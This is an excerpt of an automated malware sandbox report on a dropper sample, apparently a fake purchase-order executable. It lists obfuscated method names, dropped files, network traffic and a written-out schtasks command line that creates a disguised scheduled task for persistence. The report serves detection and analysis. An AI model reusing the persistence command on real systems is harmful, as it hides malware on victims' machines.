                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, rmFfbhZkpQQsFEbfol.csHigh entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, zFBqeEjRFBLSRfwf0A.csHigh entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, eQO0SCdvWMrQTMtdfV.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, qQX0XtkHmUSEBYI1Ue.csHigh entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, Bvw1RBceaN523NPJik.csHigh entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, oVpml5PMcJ46Alhh5x.csHigh entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, j7TAQmhL1SaPlhQ8HW.csHigh entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csHigh entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.csHigh entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, LJTjbSmSH66JQvrsi3.csHigh entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, xcI1enoJkXBKDmiAdr.csHigh entropy of concatenated method names: 'QVM6mxwjGX', 'b1s65lsxRr', 'B0I6eSGNqc', 'XVh6glPWMd', 'maa6pbCSJN', 'kvx60JQ31e', 'T0O6MB3936', 'NF461F1Wtv', 'yqf6ddV3TD', 'ISE6Ca7YTQ'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, X5ql3I12sxhVIpAQQo.csHigh entropy of concatenated method names: 'lPPF9Vw51t', 'ta6FQsuP0m', 'ec2FRqWlBB', 'IBkFmJ98ln', 'lw9F5KWJ8r', 'NgwFgwJQKO', 'S9HFpyZ7e7', 'ymc6AiB1yA', 'DSe6uTdRhB', 'eQq6Sc6ImI'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, Psiccf4bVvVDkx6mSI.csHigh entropy of concatenated method names: 'SIe6bpVlBp', 'DOL6KTt9Ys', 'FL06xslRvC', 'fCb6vApAPw', 'E0w6O3QqTf', 'X026PgcfXV', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.csHigh entropy of concatenated method names: 'A6o5OwIkJ3', 'NwV53I77IR', 'ghH5TKQVQv', 'sXm5Hrbec1', 'z1t5qI5ahZ', 'Nip5wTM0MM', 'HIe5A89n8m', 'o105uE9xko', 'uda5SxXkQ0', 'zSZ5L7dkEb'
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, pLG4Ea5tVQMslBLeve.csHigh entropy of concatenated method names: 'o7790EYlCB', 'P2m9MQyEPP', 'x0P9doUfhJ', 'xKL9C2XKvl', 'QeP9nBt5rh', 'VYy9iCE0bD', 'IkUUpuv8MphRMMf8UV', 'rUq3Hsh6vVPMVC14hY', 'Pms99W6hTd', 'ryB9QyirCB'
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
